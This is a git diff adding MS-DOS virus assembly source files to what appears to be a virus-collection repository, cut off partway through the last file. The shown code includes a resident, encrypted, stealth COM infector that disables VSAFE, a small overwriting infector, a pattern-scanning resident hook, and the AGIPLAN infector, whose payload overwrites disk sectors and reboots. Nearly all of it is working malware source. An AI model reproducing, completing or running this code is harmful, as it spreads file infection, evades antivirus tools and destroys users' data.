+;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db 'Adrian by NRLG' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +not byte ptr [di] +dec byte ptr [di] +xor word ptr [di],02ff5h +xor word ptr [di],0eaa0h +add word ptr [di],04fb9h +add word ptr [di],06236h +dec byte ptr [di] +dec word ptr [di] +add word ptr [di],096b1h +sub byte ptr [di],0c7h +dec word ptr [di] +sub word ptr [di],0463h +add word ptr [di],09553h +dec word ptr [di] +not byte ptr [di] +not byte ptr [di] +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ;Call label +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov AH,9 ;yeah!! +MOV DX,OFFSET PAO ;print my text! +INT 21H ;now! +INT 20H ;an finsh te program +NO_DAY: ;label to incorrect date +ret ;return from call +;--------------------------------- + + +PAO: +DB 10,13,'To you from Intestinal Fortitude','$' + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 019H ;day for the action +action_mes Db 0bH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.afrca109.asm b/MSDOS/Virus.MSDOS.Unknown.afrca109.asm new file mode 100644 index 00000000..beb3fb20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.afrca109.asm @@ -0,0 +1,99 @@ + +PAGE 59,132 + +; +; +; AFRCA109 +; +; Created: 16-Sep-92 +; Passes: 5 Analysis Options on: AW +; +; + +data_2e equ 4F43h +data_3e equ 0FE00h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +afrca109 proc far + +start: + mov si,100h + push si + mov ax,cs + add ah,10h + mov es,ax + xor di,di ; Zero register + mov cx,6Dh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,data_3e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,167h + mov ah,4Eh ; 'N' + jmp short loc_2 +loc_1: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov ah,4Fh ; 'O' +loc_2: + push cs + pop ds + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + mov cx,0FE1Eh + jc loc_3 ; Jump if carry Set + mov dx,cx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + xchg ax,bx + push es + pop ds + mov dx,di + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,6Dh + cmp byte ptr [di],0BEh + je loc_1 ; Jump if equal + push ax + xor cx,cx ; Zero register + mov ax,4200h + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + pop cx + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jmp short loc_1 +loc_3: + push cs + pop es + mov bl,0FCh + mov word ptr [bx],0AAACh + mov word ptr [bx+2],0FCE2h + pop di + push bx + retn + sub ch,ds:data_2e + dec bp + add bl,al + +afrca109 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ag.asm b/MSDOS/Virus.MSDOS.Unknown.ag.asm new file mode 100644 index 00000000..df12ca6d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ag.asm @@ -0,0 +1,367 @@ +.286c +.model small +.code + org 100h +start: + +jmp install + +old_si dw 0 +old_bx dw 0 +old_cx dw 0 +old_dx dw 0 +es_main dw 0 +num_ff dw 0 +last_pag dw 0 +viroff dw 0 +count db 0 +scan_seg dw 0 +mes db 'Found !','$' +filnm db 15 dup(0) +buffer db 'NCMAIN.EXE',0h,0h,0h,0h,0h + db 'QA.COM', + db 64 dup (0) + +include datagame.inc + + +int_21h_entry: + + pushf ; Push flags + sti ; Enable interrupts + cmp ah,4Bh ; + jne loc_24 ; Jump if equal + cmp al,0 + je loc_25 + +loc_24: + popf ; Pop flags + db 0EAh +old_21h_off dw ? +old_21h_seg dw ? + + +loc_25: + mov cs:old_bx,bx + push ax + push cx + push di + push es + push ds + push si + push dx + + mov si,dx +loc_205: + inc si + cmp byte ptr ds:[si],0 + jne loc_205 + mov bh,0 +loc_206: + inc bh + dec si + cmp byte ptr ds:[si],'\' + jne loc_206 + inc si + dec bh + push cs + pop es + xor cx,cx + mov bl,-1 +loc_94: + inc bl + lea di,cs:buffer + mov ax,15 + mul bl + add di,ax + push si + mov cl,bh + rep cmpsb + pop si + je loc_57 + cmp bl,4 + jne loc_94 + jmp short loc_95 + +loc_57: + mov byte ptr cs:count,0 + jmp loc_fin + +loc_95: + mov cl,bh + lea di,cs:filnm + repne movsb + sub si,3 + cmp word ptr ds:[si],'XE' + jne loc_47 + lea ax,cs:only_exe + mov byte ptr bl,cs:only_exe_count + jmp short loc_files + +loc_47: + cmp word ptr ds:[si],'OC' + je loc_79 + lea ax,cs:ov_pi + mov byte ptr bl,cs:ov_pi_count + jmp short loc_files + +loc_79: + lea ax,cs:com_exe + mov byte ptr bl,cs:com_exe_count + +loc_files: + + mov cs:viroff,ax + mov byte ptr cs:count,bl + + mov ah,3dh + xor al,al + int 21h ; file is open for reading + jc loc_fin + + mov bx,ax + mov ah,42h + xor cx,cx + mov dx,cx + mov al,2 + int 21h ; seek to the end + + mov cs:num_ff,dx ; save number of 64k + mov cs:last_pag,ax ; save length of last page + + mov ah,3eh + int 21h ; close the file + +loc_fin: + pop dx + pop si + pop ds + pop es + pop di + pop cx + pop ax +loc_en: + mov bx,cs:old_bx + jmp loc_24 + +message: + mov dx,si + mov ah,09h + int 21h + lea dx,mes + mov ah,09h + int 21h + ret + +int_4b_scan: + + mov old_bx,bx + mov old_dx,dx + push cs + pop ds + add dx,10h ; dx = Start seg + + call scanvir + jc loc_vir + + mov ax,old_bx + mov dx,old_dx + mov ds,dx + mov es,dx + retf + +loc_vir: +; call message + pop dx + pop ds + mov dx,old_dx + push dx + xor dx,dx + push dx + retf + + +scanvir: + ; dx = segment for scan (offset = 0) + ; cs:viroff = offset of virtable + ; ds = segment of virtable + ; cs:count = number of viruses + ; cs:num_ff = number of 64k + ; cs:last_pag = number of bytes in last page + ; return bit c if virus is founded + ; ds:si points to the viruses name + ; bp,es,di,bx,ax,dx + + mov cs:es_main,dx ; es_main = Start_seg + + mov bp,cs:viroff ; bp - pointer to virus table + mov bh,0 + +loc_5: + cmp byte ptr cs:count,bh + jne loc_61 + ret +loc_61: + inc bh + mov di,cs:es_main ; + mov es,di ; + xor di,di ; + mov dx,cs:num_ff ; + mov si,cs:[bp] ; si points to this viruses pattern + lodsb + mov bl,al ; bl - counter of characters in virus pattern + sub bl,1 + lodsb ; al - first char of pattern + jmp loc_12 ; go to search + +loc_9: + cmp dx,-1 ; virus is ended ? + jne loc_15 ; no + add bp,2 ; bp points to the next virus + jmp loc_5 + +loc_15: + + xor di,di ; di points to the beginning of the next segment + mov cx,es ; + add cx,1000h ; + mov es,cx ; es points to the next segment + +loc_12: + cmp dx,0 ; we'll work with last page ? + je loc_2 ; yes + mov cx,0ffffh ; cx = maximum counter + jmp loc_10 +loc_2: + mov cx,cs:last_pag ; + +loc_10: + + repne scasb ; search for first char + je loc_13 ; found + dec dx ; decrement of the counter of 64k + jmp loc_9 ; go to the preparing for the search in next segment + +loc_13: + mov cs:old_cx,cx ; + mov cs:old_si,si + push di + push es + cmp di,0fff0h + jbe loc_7 + mov cx,es + inc cx + mov es,cx + sub di,10h + +loc_7: + xor cx,cx + mov cl,bl + repz cmpsb + jne loc_11 + pop es + pop di + jmp loc_89 ; found ! + +loc_11: + mov si,cs:old_si + pop es + pop di + mov cx,cs:old_cx + jmp loc_10 + +loc_er: + + +loc_89: + stc + ret + + +pattern: + db 08eh + db 0c2h + db 08eh + db 0dah + db 08bh + db 0c3h + db 0cbh + + +install: + int 5 + + cli ; set new stack + mov ax,cs + mov ss,ax + mov bx,offset n + add bx,50h + mov sp,bx + sti + + xor ax,ax + push ax + pop ds ; ds=0 + cli + + mov di,ds:[21h*4] + mov ax,ds:[21h*4+2] + mov cs:old_21h_off,di + mov cs:old_21h_seg,ax + + mov di,ds:[31h*4] + mov ax,ds:[31h*4+2] + push ax + pop es + + + mov ds:[21h*4],offset int_21h_entry + mov ds:[21h*4+2],cs + + sti + + ; find 'MZ' + mov cx,-1 + cld + mov byte ptr al,4dh +loc_lo: + repne scasb + jne loc_err + cmp byte ptr es:[di],5ah + jne loc_lo + +loc_loop: + ; 'MZ' found + + push cs + pop ds + lea si,cs:pattern + inc si + + + mov byte ptr al,cs:[si-1] + inc si +loc_loop1: + dec si + repne scasb + jne loc_err + push cx + mov cx,6 + rep cmpsb + pop cx + jnz loc_loop1 + +suc_end: + + mov byte ptr es:[di-5],0eah + mov es:[di-4],offset int_4b_scan + mov es:[di-2],cs + +loc_err: + + mov dx,offset install + int 27h + +n: + dw 50 dup (0) + end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.agiplan.asm b/MSDOS/Virus.MSDOS.Unknown.agiplan.asm new file mode 100644 index 00000000..d1f62b0c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.agiplan.asm @@ -0,0 +1,1003 @@ + +PAGE 59,132 + +; +; +; AGIPLAN +; +; Created: 1-Sep-90 +; Version: +; Passes: 5 Analysis Options on: none +; +; +; + +movseg macro reg16, unused, Imm16 ; Fixup for Assembler + ifidn , + db 0BBh + endif + ifidn , + db 0B9h + endif + ifidn , + db 0BAh + endif + ifidn , + db 0BEh + endif + ifidn , + db 0BFh + endif + ifidn , + db 0BDh + endif + ifidn , + db 0BCh + endif + ifidn , + db 0BBH + endif + ifidn , + db 0B9H + endif + ifidn , + db 0BAH + endif + ifidn , + db 0BEH + endif + ifidn , + db 0BFH + endif + ifidn , + db 0BDH + endif + ifidn , + db 0BCH + endif + dw seg Imm16 +endm +data_1e equ 46Dh ; (0000:046D=0B35h) +data_2e equ 600h ; (0000:0600=54h) +data_3e equ 0Eh ; (0A10:000E=1) +data_4e equ 1 ; (936D:0001=0FFFFh) +data_5e equ 0 ; (936E:0000=0) +data_6e equ 2 ; (936E:0002=0) +data_7e equ 12h ; (936E:0012=0) +data_8e equ 14h ; (936E:0014=936Eh) +data_9e equ 0F0h ; (936E:00F0=0) +data_10e equ 0F6h ; (936E:00F6=0) +data_11e equ 0FAh ; (936E:00FA=0) +data_12e equ 0FEh ; (936E:00FE=0) +data_45e equ 2Ch ; (93CE:002C=0FFFFh) +data_46e equ 5B0h ; (93CE:05B0=41h) +data_47e equ 600h ; (93CE:0600=41h) +data_48e equ 1 ; (FFFE:0001=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +agiplan proc far + +start: + jmp loc_43 ; (04CF) +data_14 db 'P1.8&', 5, 'u', 7, 'X.', 0FFh + db '.', 5, '', 0FFh, 0 + db 75h,0F4h, 58h +data_15 db 9Dh + db 0B8h, 03h, 00h,0CFh, 90h, 90h + db 90h +data_16 db 0 + db 90h, 00h,0FFh,0FFh,0FFh,0FFh + db 0FFh + +agiplan endp + +; +; +; External Entry Point +; +; + +int_21h_entry proc far + pushf ; Push flags + cmp ah,4Eh ; 'N' + jne loc_4 ; Jump if not equal + jmp short loc_8 ; (0154) +loc_4: + cmp ah,4Bh ; 'K' + jne loc_5 ; Jump if not equal + jmp short loc_8 ; (0154) +loc_5: + cmp ah,0Eh + jne loc_6 ; Jump if not equal + jmp short loc_8 ; (0154) +loc_6: + cmp ah,40h ; '@' + jne loc_7 ; Jump if not equal + jmp short loc_8 ; (0154) +loc_7: + popf ; Pop flags + jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_8: + cli ; Disable interrupts + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + mov cs:data_31,ss ; (936E:05DB=0A10h) + mov cs:data_32,sp ; (936E:05DD=743h) + mov al,0FFh + mov cs:data_30,al ; (936E:05DA=0FFh) + mov ax,3524h + int 7Eh ; ??INT Non-standard interrupt. + cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) + jne loc_9 ; Jump if not equal + mov ax,2524h + mov dx,108h + push cs + pop ds + int 7Eh ; ??INT Non-standard interrupt. +loc_9: + sti ; Enable interrupts + jmp short loc_11 ; (01AA) +loc_10: + cli ; Disable interrupts + xor ax,ax ; Zero register + mov cs:data_30,ah ; (936E:05DA=0FFh) + mov ss,cs:data_31 ; (936E:05DB=0A10h) + mov sp,cs:data_32 ; (936E:05DD=743h) + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es + popf ; Pop flags + sti ; Enable interrupts + jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_11: + pop ax + pop bx + push bx + push ax + cmp ah,4Bh ; 'K' + je loc_16 ; Jump if equal + cmp ah,40h ; '@' + jne loc_12 ; Jump if not equal + jmp short loc_15 ; (01CC) +loc_12: + cmp ah,0Eh + jne loc_13 ; Jump if not equal + jmp short loc_10 ; (0187) +loc_13: + cmp ah,4Eh ; 'N' + jne loc_10 ; Jump if not equal + jmp short loc_10 ; (0187) + db 90h +loc_14: + jmp loc_23 ; (0283) +loc_15: + mov ax,0Fh + cmp cs:data_29,al ; (936E:05D9=0) + jb loc_10 ; Jump if below + ja loc_14 ; Jump if above + cmp bx,4 + jbe loc_10 ; Jump if below or = + mov bx,1 + push cs + pop ds + add ds:data_11e,bx ; (936E:00FA=0) + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. + cmp dh,ds:data_11e ; (936E:00FA=0) + ja loc_10 ; Jump if above + mov bx,data_3e ; (0A10:000E=1) + add bx,data_32 ; (936E:05DD=743h) + mov ss:[bx],bx + jmp short loc_10 ; (0187) + db 01h, 90h, 90h, 90h +loc_16: + mov cs:data_33,dx ; (936E:05DF=3D7Bh) + mov cs:data_34,ds ; (936E:05E1=7B6Eh) + push cs + pop ds + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. + cmp dh,ds:data_12e ; (936E:00FE=0) + jb loc_17 ; Jump if below + jmp loc_10 ; (0187) +loc_17: + mov dx,data_33 ; (936E:05DF=3D7Bh) + mov ds,data_34 ; (936E:05E1=7B6Eh) + push ax + mov al,2Eh ; '.' + cld ; Clear direction + push ds + push dx + cli ; Disable interrupts + mov di,dx + push ds + pop es + mov cx,20h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + jnz loc_20 ; Jump if not zero + push cs + pop ds + mov si,offset data_21 ; (936E:05C8=43h) + mov cx,3 + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jnz loc_22 ; Jump if not zero + sub di,0Bh + mov si,offset data_20 ; (936E:05C0=43h) + mov cx,0Bh + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + mov dh,0FFh + mov cs:data_16,dh ; (936E:0128=0) + jz loc_18 ; Jump if zero + xor dx,dx ; Zero register + mov cs:data_16,dh ; (936E:0128=0) +loc_18: + add sp,6 + push cs + pop ds +loc_19: + call sub_2 ; (02C0) +loc_20: + jmp loc_10 ; (0187) + db 90h, 90h +loc_21: +;* jmp loc_34 ;*(03E0) + db 0E9h, 76h, 01h +loc_22: + add sp,6 + push cs + pop ds + mov dx,5C0h + mov data_33,dx ; (936E:05DF=3D7Bh) + mov data_34,ds ; (936E:05E1=7B6Eh) + mov dh,0FFh + mov data_16,dh ; (936E:0128=0) + jmp short loc_19 ; (025F) + db 90h +loc_23: + mov cx,501h + mov dx,100h + call sub_1 ; (02A0) + mov dx,101h + call sub_1 ; (02A0) + mov dx,380h + call sub_1 ; (02A0) + mov dx,381h + call sub_1 ; (02A0) + int 19h ; Bootstrap loader +int_21h_entry endp + + +; +; SUBROUTINE +; + +sub_1 proc near + push dx +loc_24: + mov ax,309h + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + sub dh,1 + cmp dh,0 + jge loc_24 ; Jump if > or = + pop dx + push dx + sub cx,100h + cmp cx,0 + jge loc_24 ; Jump if > or = + retn +sub_1 endp + + db 90h, 90h, 90h +loc_25: + jmp loc_31 ; (03A3) + +; +; SUBROUTINE +; + +sub_2 proc near + mov ah,48h ; 'H' + mov bx,0FFFh + int 7Eh ; ??INT Non-standard interrupt. + jc loc_21 ; Jump if carry Set + nop + mov ds:data_11e,ax ; (936E:00FA=0) + mov dx,data_33 ; (936E:05DF=3D7Bh) + mov ds,data_34 ; (936E:05E1=7B6Eh) + mov ah,3Ah ; ':' + mov bx,dx + add bx,1 + cmp ah,[bx] + mov ah,0 + jnz loc_27 ; Jump if not zero + mov bx,dx + mov al,50h ; 'P' + mov ah,[bx] + cmp ah,50h ; 'P' + ja loc_26 ; Jump if above + sub ah,40h ; '@' + jmp short loc_27 ; (02F5) +loc_26: + sub ah,60h ; '`' +loc_27: + mov dl,ah + mov ah,36h ; '6' + int 7Eh ; ??INT Non-standard interrupt. + cmp bx,9 + jb loc_25 ; Jump if below + mov dx,cs:data_33 ; (936E:05DF=3D7Bh) + mov ax,4300h + int 7Eh ; ??INT Non-standard interrupt. + mov cs:data_39,cx ; (936E:05EC=20h) + mov ax,4301h + xor cx,cx ; Zero register + int 7Eh ; ??INT Non-standard interrupt. + nop + mov ax,3D42h + int 7Eh ; ??INT Non-standard interrupt. + jc loc_25 ; Jump if carry Set + mov bx,ax + mov ah,3Fh ; '?' + mov cx,0FFFFh + mov dx,600h + mov ds,cs:data_11e ; (936E:00FA=0) + int 7Eh ; ??INT Non-standard interrupt. + jc loc_30 ; Jump if carry Set + add ax,600h + mov cs:data_10e,ax ; (936E:00F6=0) + cmp ax,1000h + jb loc_30 ; Jump if below + cmp ax,0D000h + ja loc_30 ; Jump if above + mov si,offset ds:[100h] ; (936E:0100=0E9h) + push cs + pop ds + xor di,di ; Zero register + mov es,cs:data_11e ; (936E:00FA=0) + mov cx,2FFh + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + push es + pop ds + xor di,di ; Zero register + mov si,data_2e ; (0000:0600=54h) + mov cx,10h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_30 ; Jump if zero + mov ah,cs:data_16 ; (936E:0128=0) + cmp ah,0FFh + jne loc_28 ; Jump if not equal + call sub_3 ; (03C8) + jmp short loc_29 ; (0377) +loc_28: + mov ax,9090h + mov ds:data_1e,ax ; (0000:046D=0B35h) +loc_29: + nop + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 7Eh ; ??INT Non-standard interrupt. + mov ax,5700h + int 7Eh ; ??INT Non-standard interrupt. + push cx + push dx + mov ah,40h ; '@' + mov cx,cs:data_10e ; (936E:00F6=0) + xor dx,dx ; Zero register + mov ds,cs:data_11e ; (936E:00FA=0) + int 7Eh ; ??INT Non-standard interrupt. + pop dx + pop cx + mov ax,5701h + int 7Eh ; ??INT Non-standard interrupt. +loc_30: + mov ah,3Eh ; '>' + int 7Eh ; ??INT Non-standard interrupt. +loc_31: + mov cx,cs:data_39 ; (936E:05EC=20h) + mov dx,cs:data_33 ; (936E:05DF=3D7Bh) + mov ds,cs:data_34 ; (936E:05E1=7B6Eh) + mov ax,4301h +loc_32: + int 7Eh ; ??INT Non-standard interrupt. + push cs + pop ds + mov es,cs:data_11e ; (936E:00FA=0) + mov ah,49h ; 'I' + int 7Eh ; ??INT Non-standard interrupt. + retn +sub_2 endp + + db 90h, 90h, 90h, 90h, 90h + +; +; SUBROUTINE +; + +sub_3 proc near + mov ax,0D08Eh + mov ds:data_1e,ax ; (0000:046D=0B35h) + mov di,data_2e ; (0000:0600=54h) + mov cx,3000h + mov ax,0B8C9h +loc_33: + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp ah,es:[di] + jne loc_33 ; Jump if not equal + mov dx,4200h + cmp dx,es:[di+1] + jne loc_33 ; Jump if not equal + mov dh,0BAh + cmp dh,es:[di-5] + jne loc_33 ; Jump if not equal + cmp cx,0 + jne loc_35 ; Jump if not equal + pop dx + jmp short loc_32 ; (03B5) + db 90h +loc_35: + mov dx,es:[di-4] + add dx,600h + mov es:[di-4],dx + retn +sub_3 endp + + db 11 dup (90h) + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,4A00h + mov bx,5Fh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,cs + sub bx,1 + mov ds,bx + mov ax,0FFFFh + mov ds:data_4e,ax ; (936D:0001=0FFFFh) + push cs + pop ds + mov ax,4800h + mov 